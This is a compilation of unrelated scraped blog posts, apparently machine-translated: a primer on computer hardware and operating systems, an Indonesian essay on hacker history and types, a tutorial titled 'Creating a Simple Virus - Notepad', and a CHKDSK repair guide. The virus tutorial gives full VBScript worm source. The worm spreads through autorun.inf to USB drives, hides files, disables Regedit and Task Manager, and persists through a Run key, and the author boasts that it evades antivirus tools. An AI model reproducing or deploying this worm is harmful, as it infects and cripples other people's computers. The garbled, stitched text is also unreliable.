The computer and its components

I-Definitions: A-information: Information is a data set with a meaning that will enrich our knowledge. It is the carrier of human knowledge. Information = Data + Meaning Information can be in various forms: text, image, sound, video ... Note: In automatic processing, the user intervention is very low. It is the domain of a new science is computer science. 2-L'informatique: The computer designates the automation of information processing by a system of practical (machine) or abstract. Also, the computer means all of science and technology related to the processing of information. = Information + Automatic Computer The word computer was created in March 1962 by Philippe Dreyfus from the words: Information and Control. This word is accepted by the French Academy in 1967. 3-The computer system: The computer system is a system capable of operating a data processing by significantly reducing human intervention. For a computer system to process information automatically, it needs an infrastructure composed of organs to acquire data, process and return the results.'s Computer. The computer is a computer system. Note: A computer system consists of two interrelated parts: hardware and software. 4-The computer: A computer is an electronic machine that processes information to allow you to perform various tasks, have fun with games, listen to music or watching movies. Computers are increasingly widespread and indispensable in the home and office. Note: The microcomputer operates under the principle: data entry - data processing - output of processed data. Entering data entering the computer where they are processed by a program that renders other data. Peripherals Peripheral PU Release
A great system manages the program and liaising with the various hardware components and software: the OS (Operating System in English acronym OS). Software = OS + applications + utilities II-computer components (equipment): A computer is composed of the following main elements (Périphiriques):
1 - The central unit includes: * Processor: He reads the instructions from the program and tells the computer through the operating system what to do. The speed at which it processes data internally expressed in megahertz (MHz) and gigahertz (GHz). * Submissions: ** Read Only Memory (ROM, Read Only Memory). This memory is not changed (except by special programs). It contains an internal program useful for operating computer (known as BIOS). The contents of this memory is permanent. ** Memory (RAM, Random Access Memory). This memory contains the operating system, programs and data. This memory is erased when the computer is turned off. ** Auxiliary memory or magnetic memory or external or secondary name usually used for floppies or hard drives. It is on this external memory that will be stored programs and data. This memory is permanent (except erasing wanted). ** Buffer: special memory connected to the processor to improve performance. * The Bus: liaises between the processor and RAM, and manages the transfer of data and instructions between these two components. * Controllers Input / Output: electronic devices that control the various organs of input-output (hard, floppy or CD burner ...). The input-output controllers are generally integrated into the motherboard or are an additional card. These elements are a large electronic board called a motherboard. 2 - Input / Output devices for entering data (keyboard, mouse, scanner ...), store (floppy, hard drive ...) to distribute or display devices (monitor, printer ...) or otherwise. Among the various devices include (this list is not exhaustive). * The keyboard to enter data (such as a typewriter). * The mouse device has become indispensable in modern operating systems, additional keyboard to move through the windows. Verbs are associated with mouse click (and double clicking), drag, move ...
* The floppy disk that was one of the first medium used to store programs and data. Less and less used. Size 1.44 MB * The HDD (hard disc in English) is the essential complement of the computer to store programs and data. Height in GB (30,40,60, 80 GB ..).
* The screen (or monitor) for displaying text and images.Taille expressed in inches (17 inches for example). Types: CRT or LCD. * CD-ROM drive or DVD drive to install most software or play multimedia data (images, sounds). Most computers come with a CD-ROM or DVD drive (which can also play CDs). Size in megabytes (650 megabytes for a CD-ROM) and speed (in the form nX, 4X, 8X, 52X ...). * A CD burner or DVD burner: Save data to CDs. Also read CDs. * The speakers connected to the soundcard. * Printer for printing on paper or similar. Units used: number of pages printed per minute, in dots per inch definition. * The scanner: for "photocopy" of the images or text and treated by specialized software. * A modem (internal or external) to communicate by telephone network (Internet for example). * A network card to connect to other computers via a network. Also used for certain connections to the Internet via ADSL. ... The devices are connected to the computer directly on the motherboard or add-on cards via cables external or internal layers. Catches are called external ports (serial, parallel, USB, Firewire, SCSI, ...). The devices are controlled by specialized programs called drivers (drivers in English), using protocols for data exchange. Drivers are to be included in the operating system or provided by manufacturers on CD. The economies of these updated drivers are usually available on the Internet. We can cite some ports and protocols: * Serial port: we connect slow devices: the modem (if external), keyboard, mouse. On the PC serial port is known as COM1, COM2 or COM3. Installed in series on the PC on modern Macintosh (from the G3 blue) this port tends to disappear in favor of USB (Universal Serial Bus). * USB (Universal Serial Bus): we connect more and more different devices such as keyboard, mouse, modem, scanner printer, external hard drive, external CD burner, speakers, microphone, webcam ... You can connect up to 127 devices to USB ports. When the number of available slots is insufficient HUBs are used (or hubs). 2 USB ports (or more) are installed as standard on modern PCs .. There are no connections son for some devices. Inside the computer, to the extent of the available space, you can add hard drives, CD-ROM or DVD-ROM drive or DVD, or SCSI connections according to ATA (Advanced Technology) also known as called IDE (Integrated Drive Electronics) with variations ATAPI (AT Attachment Packet Interface Bus) or Ultra DMA (Direct Memory Access). Material = P. P + input + + exit P.mémorisation P.calcul + P.transmission. III-OS The operating system is a program that allows the computer to manage its memory, peripherals and circulation of its information. This is the great manager who told the microprocessor what to do. Without it, the computer could not start or perform actions. Synonymous with the term operating system is the operating system. Several operating systems are available on the market. Operating systems commonly used in PC (Personal Computer) family are: - - Windows95 was released in August 1995 - - Windows98 was released in June 1998 - - WindowsMe (or Millennium) released in October 2000 - - Windows XP Home Edition was released in December 2001. There are also professional versions: Windows 2000 Pro, Windows NT, Windows XP Professional Edition. Windows is developed by Microsoft. Alternative systems are also available on PC: UNIX, Linux, OS2, BeOS. For Macintosh systems are the most recent Mac OS X version 10.2.x and Mac OS 9.22.

Indonesia Hacker,HACKER

Indonesia Hacker atau Hacker Indonesia atau Indonesian Hacker, di bolak balik ajah sih sebenernya. Haha.. Kini bendera Indonesia mulai berkibar di dunia internet karena komunitas hacker indonesia yang sangat kompak, atraktif, maju, innovatif dan terbuka. Oleh karena itu mari kita teruskan perjuangan para under / up ground Indonesia Hacker. Demi kemajuan dunia teknologi informatika saat ini mari seluruh Indonesia Hacker atau Hacker Indonesia atau Indonesian Hacker pada umumnya dan BinusHacker khususnya mendukung perkembangan teknologi dan opensource.
Berikut ini ulasan yang sedikit gw dapet tentang sejarah hack this stuff dari bang kiwil dengan sedikit banyak gw revisi dolo demi perkembangan Indonesia Hacker. Hehe..
Sejarah tentang Hack, Hacker, dan Hacking
Sebelum terbentuknya komunikasi yang tercipta di Internet, pada tahun 1960-an beberapa mahasiswa ilmu komputer di Massachusetts Institute of Technology (MIT) yang gemar untuk melakukan engineering dan re-engineering terhadap perangkat keras dan perangkat lunak sering melakukan diskusi-diskusi terbuka yang disana membahas masalah :
  • Ide-ide mengenai pengembangan perangkat keras dan perangkat lunak
  • Ide-ide mengenai transformasi terhadap teknologi dan informasi
Pengistilahan dan perkataan “Hack” sebenarnya adalah merupakan slang yang pada saat itu belum memiliki arti yang spesifik dan sebenarnya. Kebiasaan-kebiasaan mengucapkan “I Hack This Stuff” seakan-akan memberikan arti bahwa istilah Hack merupakan kegiatan yang sedang dan memperoleh hasil setelah melakukan pengembangan terhadap segala sesuatu yang dilakukan. Pengembangan-pengembangan yang secara khusus diberikan kepada minicomputer dan microcomputer tersebutlah istilah “Computer Hacker” terbentuk.
Dengan kata lain, Computer Hacker adalah seseorang yang mengaplikasikan kemampuan dalam cakupannya mengenai komputer software, komputer hardware, komputer arsitektur, komputer desain, serta administrasi yang terkandung didalamnya. Seorang Hacker dituntut memiliki kemampuan dalam hal pemrograman untuk tingkatan software, dan keahlian dibidang hardware. Tuntutan yang sedemikian luasnya untuk keamanan disisi sistem aplikasi dan jaringan, memberikan motivasi bagi seorang Hacker untuk mengembangkan keahlian tersebut sehingga hasil dari penelitian yang dilakukan akan memberikan dampak yang positif bagi kelangsungan IT itu sendiri.
Dengan melihat sekelumit penjelasan diatas, kita dapat memberikan kesimpulan bahwa Hacking bukanlah sebatas pada kegiatan illegal yang identik dengan pengrusakan sebuah sistem dan aplikasi, atau sebatas kegiatan-kegiatan tentang pencurian sebuah data-data penting, melainkan kepada tindakan untuk melakukan perubahan yang mendasar atau perbaikan-perbaikan terhadap sistem dan aplikasi, baik yang berupa software ataupun hardware.
  • Black Hat Para hacker yang menjelma menjadi cracker / attacker yang menggunakan kemampuannya untuk tujuan kriminal dan cenderung membahayakan kepentingan pihak lain. Pada umumnya orang-orang yang tergabung dalam kelompok ini adalah yang bergerak secara individu atau sesuai idealisme tertentu dan tidak terikat atas kepentingan pihak tertentu.
  • Grey Hat Para hacker yang memberikan informasi yang diperoleh ke para attacker maupun para vendor, untuk memperoleh imbalan tertentu. Kelompok ini dikenal juga sebagai cracker, yakni orang-orang yang tidak memiliki keberpihakan pada pihak manapun dan menjual berbagai informasi yang diperlukan sesuai kebutuhan yang ada.
  • White Hat (hacker sejati) Orang-orang yang melakukan aktivitas hacking dalam rangka memperoleh informasi tentang celah-celah keamanan, maupun kelemahan-kelemahan yang dimiliki untuk diberikan kembali kepada pihak yang bersangkutan untuk disempurnakan kembali.
  • Blue Hat yang punya kemampuan seperti white hat, tapi berkecimpung di dunia pendidikan.
Pembagian para hacker berdasarkan profile kemampuan profesionalnya terbagi menjadi tujuh kelompok. Hal ini sebagaimana dijelaskan oleh Marc Rogers MA, seorang guru besar psikologi dari University of Manitoba Hawai, yakni:
  • Tool Kids/NewBies Orang-orang yang baru belajar aktivitas hacking, namun kemampuan kemampuan tentang komputer serta teknik pemrograman relatif terbatas dan hanya baru bisa membuat program-program dasar. Aktivitas hacking yang dilakukan, umumnya menggunakan bantuan aplikasi yang terdapat di internet hingga tidak murni mengandalkan kemampuan individunya.
  • Cyber Punk Orang-orang yang memiliki pengetahuan dan teknik komputer yang lebih tinggi dibandingkan NewBies. Mereka sudah mampu memahami karakteristik dari sistem jaringan ataupun sistem yang sedang mereka serang. Pengetahuan mereka tentang bahasa pemrograman cukup andal, karena mampu mendefinisikan hingga karakteristik umumnya. Dengan kemampuannya ini, ia sudah mampu menciptakan alat bantu infiltrasi sendiri, hingga tidak lagi menggunakan program-program bantu yang tersedia di internet. Aktivitas-aktivitas yang dilakukan memiliki kecenderungan untuk kriminal, seperti defacing web, carding, ataupun spamming.
  • Internals Orang-orang yang masih bergabung ataupun pernah (mantan) dengan perusahaan TI, dengan kemampuan komputer dan programming yang anda. Dan melakukan berbagai aktivitas hacking dengan mengandalkan berbagai kombinasi sumber daya internal maupun eksternal yang ada untuk berbagai tujuan. Contoh, pelanggaran paling sering dilakukan adalah breaking over priviledge activity, yakni segala aktivitas yang melanggar batasan-batasan hak yang dimiliki.
  • Coders Golongan ini dikenal juga sebagai resources, yakni orang-orang yang menjual berbagai informasi yang ada di internet ke pihak-pihak yang membutuhkan. Kemampuan programming dan teknisnya sangat andal dan kelompok ini malakukan berbagai aktivitas infiltrasi dalam rangka untuk memperoleh berbagai data ataupun informasi yang dapat dijual. Coders juga membantu membuat berbagai aplikasi bantu hacking yang dibutuhkan oleh para hacker ataupun attacker/cracker yang membutuhkan.
  • Old Guard Hackers (Idealism Gate Keepers) Para hacker sejati yang murni melakukan aktivitas-kativitas hacking dalam rangka untuk tujuan ilmiah dan kebaikan semua pihak. Jumlah golongan ini relatif sangat sedikit, karena idealisme yang dijunjung memaksa mereka untuk menggunakan kode etik yang dijunjung tinggi oleh para hacker, yakni kemampuan di atas segalanya.
  • Professional Criminals Para attacker/cracker yang bergerak atas nama kelompok ataupun individu dan melakukan berbagai aktivitas cyber crime sebagai sumber kehidupan utamanya. Kemampuan yang dimiliki oleh kelompok ini sangat sempurna karena mengombinasikan berbagai piranti keras dan pengetahuan programming yang bisa diandalkan dibantu data/informasi yang diperoleh dari Coders. Aktivitas kejahatan yang dilakukan tidak lagi dalam kelas cyber punk yang lebih banyak pada target individu, namun justru pada kalangan korporat dengan jalan merampok dana yang tersedia dengan melakukan transfer secara tersembunyi.
  • Cyber Terrorist Sekelompok orang atau individu yang bertindak atas dasar sentimen pada suatu kelompok atau pihak tertentu, dan melakukan berbagai aktivitas yang bertujuan untuk menunjukkan eksistensi mereka pada lingkungan dunia. Tingkatan kemampuan yang dimiliki kelompok ini adalah yang tertinggi karena menggabungkan berbagai sumber daya yang ada, level kemampuan, bahkan menggunakan sarana prasarana bantuan dari pihak sponsor yang membantu seperti satelit komunikasi.
Apapun alasannya ‘hacking’ adalah tindakan yang tidak melangar hukum, namun disebut “cracking” apabila digunakan untuk merusak, menghilangkan data / sesuatu yang bukan milik kita. Akan tetapi yang kita ketahui bersama – sama bahwa tidak adanya jaminan yang memastikan data atau informasi yang kita punya adalah 100 % aman dan kondisi inilah yang digunakan orang untuk memulai “pekerjaan” merusak dari awalnya iseng hingga professional. Hal terpenting yang bisa kita lakukan adalah menutup segala kemungkinan celah keamanan yang terbuka dan selalu mengupdate data / informasi [ siaga ].
[ How About You ? What Type Of Hacker You Want ? Ready To Hack? ]
Oke – Apakah lu dah siap untuk gabung jadi Hacker Indonesia ?? Ato lu mundur??
Hehehehhe.. Mari kita kibarkan Bendera Merah Putih Indonesia di Dunia Cyber!!
We are Indonesian Hacker ( Kami adalah Hacker Indonesia )
Yang Menjunjung Tinggi Pancasila dan Bhinneka Tunggal Ika :D
Please Support Indonesia Hacker atau Hacker Indonesia atau Indonesian Hacker!
Viva Hacker Indonesia – Maju Terus Indonesia Hacker


Creating a Simple Virus - Notepad

Flash fad Disc striking my brother suddenly I found a local malcode VBS made with the language. Well, it turns out the virus makers will begin to look to use VBS language. Maybe because it involves the IPR (Intellectual Property) for the many outstanding VB6.0 is pirated. So he made a virus with VBS that can be made only with the Windows Notepad because existing compiler integrated with it, Windows Based Script Host.
Sesua I promise, we will create a simple virus using Notepad. This virus will make himself spread to removable disc with autorun so that other computers will become infected flash disc plugged directly into the victim without waiting Users running her infector. This virus I give the name "Kalong.VBS". Now open Notepad him. Copy the following code:
'/ /-The beginning of the code, set for when the error is left and then continue the activities of virus-/ / on error resume next
'/ /-Dim following words-/ / dim rekur, windowpath, flashdrive, fs, mf, content, tf, bats, nt, check, sd
'/ / Set a text that will be made to Autorun Setup Information-/ / content = "[autorun]" & vbCrLf & "shellexecute = wscript.exe k4l0n6.dll.vbs" set fs = CreateObject ("Scripting.FileSystemObject") set mf = fs.getfile (Wscript.ScriptFullname) dim text, size size = mf.size check = set text = mf.openastextstream (1, -2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbCrLf loop do
'/ /-Copy itself to become the master file in the Windows Path (example: C: \ Windows) Set windowpath = fs.getspecialfolder (0) set tf = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs") tf.attributes = 32 set tf = fs.createtextfile (windowpath & "\ batch-k4l0n6.dll.vbs", 2, true) tf.write recursive tf.close set tf = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs") tf.attributes = 39 '/ /-Make Atorun.inf to run the virus automatically each flash disc plugged-/ / 'It spreads to every drive that bertype 1 and 2 (removable) including floppy disks
for EACH flashdrive in fs.drives '/ /-Check the Drive-/ / If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
'/ /-Make infector if it turns out Drivetypr 1 or 2. Or A: \ - / / set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs") tf.attributes = 32 set tf = fs.createtextfile (flashdrive.path & "\ k4l0n6.dll.vbs", 2, true) tf.write recursive tf.close set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs") tf.attributes = 39
'/ /-Make the text of his Atorun.inf had already set up (Auto Setup Information) - / / set tf = fs.getfile (flashdrive.path & "\ autorun.inf") tf.attributes = 32 set tf = fs.createtextfile (flashdrive.path & "\ autorun.inf", 2, true) tf.write content tf.close set tf = fs.getfile (flashdrive.path & "\ autorun.inf") tf.attributes = 39 end if next
'/ /-Manipulation of the Registry-/ /
set bat = CreateObject ("WScript.Shell")
'/ /-Manip - Change Internet Explorer Title to The Bat vs. Zay-/ / kalong.regwrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title", "The Bat vs. Zay "
'/ /-Manip - Set for hidden files are not displayed in Explorer-/ / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ Advanced \ Hidden", "0", "REG_DWORD"
'/ /-Manip - Eliminate the Find menu, Folder Options, Run, and block the Regedit and Task Manager-/ / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFind", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFolderOptions", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoRun", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableRegistryTools", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableTaskMgr", "1", "REG_DWORD"
'/ /-Manip - Disable right-click / / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoViewContextMenu", "1", "REG_DWORD"
'/ /-Manip - Come up with messages every Windows Startup-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ LegalNoticeCaption", "Worm Bat. Variant from Rangga-Zay, do not panic all data are safe. "
'/ /-Manip - On every Windows Startup-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ Systemdir", windowpath & "\ batch-k4l0n6.dll.vbs"
'/ /-Manip - Change RegisteredOwner and Organization-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOrganization", "The Batrix" kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOwner", "Bat"
'/ /-Now if the code below I do not know, please Mas Aat_S to explain-/ / if check <> 1 then Wscript.sleep 200 000 end if loop while check <> 1 set sd = CreateObject ("") windowpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname 'End of Code
Save the code in Notepad with the way FILE> SAVE. Then in the save as type choose "All Files (*.*). Save with the name: k4l0n6.dll.vbs. Actually do not have to use *. dll also okay but the effort to avoid suspicious aja.
He .. he ... This worm virus is not purely of my own thoughts because it mimics the virus code Rangga-Zay. But this one better because it was not detected using PCMAV RC15, ClamAV, and Avast. It was counted as it made you know if a virus / worm does not need to buy pirated software. Use Notepad (from Windows Original) can also

How To Improve Notebook

One cause of the hard drive frequently hangs the computer, the computer restarts itself and the view is the presence of a problem bluescreen / keruksakan on computer hard drives. Keruksakan on this hard drive because of them often turned off the computer without a shutdown due to interference with the alian electrical appliances such as death or sudden occurrence of voltage spikes such as that usually happens when the existence of lightning at a time when it rains. Besides the age factor (lifetime) from the hard drive itself is also a thing that can affect the performance of a disk. On this occasion I will share information about How To Improve Notebook using the command Checkdisk / CHKDSK.EXE.
Checkdisk default Windows tool that we can use to test and improve the condition of the hard disk. Running commands on a regular basis Checkdisk is also one way to maintain and improve computer performance. Generally enough to command Checkdisk / CHKDSK is we have to fix keruksakan on the hard drive such as bad sectors, lost clusters, cross-linked files, and directory errors. Checkdisk command can we call / run in 2 ways via Command Promt and through My Computer or Windows Explorer.
1. Running CHKDSK command on the Command Prompt.

* In the Command Prompt type the command: CHKDSK D:
This will run a CHKDSK on Drive D in read-only mode.
* Type the command: CHKDSK D: / F
The command is used to repair errors without scanning for bad sectors.
* Type the command: CHKDSK D: / R
The command is used to repair errors, finding bad sectors and recover data.
2. Running CHKDSK command in My Computer or Windows Explorer.

* Open Windows Explorer or My Computer.
* Right click on the hard drive that will be in-check, click Properties.
* Click the Tools tab, Error Checking click on the option Check Now ..
* Check Disk option window will appear.

how to repair hard drive

- To run Chkdsk in read-only mode mode, click Start.
- To repair a bad sector error without sanning select Automatically fix file system errors check box, then click Start.
- To repair errors, find the bad sectors and recover data select Scan for and attempt recovery of bad sectors, and then click Start.

* If a message appears: Chkdsk can not run Because the volume is in use by another process. May Chkdsk run if this volume is dismounted first. Opened handles ALL TO THIS VOLUME Would THEN BE INVALID. Would you like to force a dismount on this volume? (Y / N) Type Y and Enter.
* If a message appears: Chkdsk can not run Because the volume is in use by another process. Would you like to schedule this volume to be checked the next time the system restarts? (Y / N) Type Y, and ENTER and then restart the computer to run Scandisk.
To fix the hard drive using a utility Checkdisk / CHKDSK command is there some method we can do, namely:

1. If the computer can still boot and log into windows then the second way to run CHKDSK.EXE above (via a command prompt or Windows Explorer) we can do.
2. If the hard drive can not be using that to boot, then we must take the hard drive and install it on another computer, then run the command Checkdisk / CHKDSK.
3. Using the Windows Setup CD and run the CHKDSK command through the Recovery Console menu ..
4. Using UBCD4Win CD. I click Start - Programs - Disk Tools - Diagnostic, click the Check Disk.
So how to fix the hard drive using the utility built-in Windows: Checkdisk / CHKDSK.EXE this, and from my own experience has proven quite effective tool to handle keruksakan on the hard disk. At the next opportunity I will try to review on how to fix the hard drive for bad sectors. Hope can help ...
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